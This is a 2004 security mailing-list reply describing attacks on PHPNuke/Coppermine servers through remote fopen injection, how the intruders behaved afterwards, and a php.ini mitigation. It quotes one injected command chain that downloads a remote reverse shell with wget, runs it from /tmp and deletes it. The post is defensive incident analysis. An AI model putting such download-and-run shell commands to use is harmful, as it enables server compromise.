Re: Strange Attack On A Webserver I Work On

From: Tom Walsh (
Date: 10/31/04

  • Next message: Vincent IP: "Linux security compliance"
    To: <>
    Date: Sun, 31 Oct 2004 14:23:22 -0600

    > I started to think about a Zombie network a little bit later, as it seems
    > to be the only thing that would make sense aside fromt he script kiddy
    > screwing up. Do you know if it's at all possible, or if there have ever
    > been any vulnerabilities in PHP or PHP based software (PHPNuke for
    > example, lots of users on the server use this) to execute the code? I
    > know it would execute properly through apache as it's not PHP code, it's a
    > binary files.... but maybe there's a way to force it to execute using the
    > built in system() command or something? Just a thought.


    If you have PHPNuke installations and any of them are using the Coppermine
    gallery (, there is a remote
    fopen exploit through this combination. I have had several customer's
    servers exploited by to this type of attack. For the most part they were all
    based out of Brazil using well published and documented exploits. Typically
    they use the webspace of a compromised server to host a remote reverse shell
    application. Using the fopen technique, they are able to inject a series of
    local commands (cd /tmp; wget;
    /tmp/remoteshell &; rm /tmp/remoteshell). They then connect to the remote
    shell and try various forms of local root exploits on the kernel. Depending
    on the level of success they have with that, they will either:

    1) if the obtain root privileges, install their own "h4x0r" index.php for
    every instance of index.php and index.html and submit the sites listed to
    some site that tracks "h4x0r3d" sites. They will install some sort of IRC
    bouncer, or IRC script and attach it to some IRC channel as a zombie. They
    will leave the remote shell running for future needs, and sign off.

    2) If they are unable to get root privileges, they will typically install an
    IRC bouncer and maybe an IRC zombie script, leaving the remote shell running
    and then signing off.

    I was able to observe their movements for a couple of days as a mock IRC
    zombie, joining their IRC channels, and watching their discussions, as most
    of it was in Portuguese, I wasn't able to follow too much of it.

    I used the zombie information collected in the IRC channels to contact other
    server admins of compromised servers, and inform them of the compromise.
    Almost all had no idea that they were compromised at all and that my contact
    was the first inclination of trouble. After discussions with theses admins
    the common denominator seemed to be PHPNuke with Coppermine. (I believe that
    Coppermine is no longer supported by the author and as such these
    vulnerabilities will not be corrected.)

    To prevent problems like this, I typically turn off remote fopen priviledges
    in php.ini (allow_url_fopen = Off). I have only had a couple of instances
    where customers have requested that it be turned on, and most of the time we
    have found an alternative solution.

    With reference to your previous discussion, perhaps the script kiddie was
    attempting to put the file in place for downloading to another computer for
    a remote attack (like the method above). Just a suggestion and thought.
    Seems rather obvious, and not terribly bright, though.

    If you need any additional information, please let me know and I will try
    and provide you with what ever information I have available.

    Tom Walsh

  • Next message: Vincent IP: "Linux security compliance"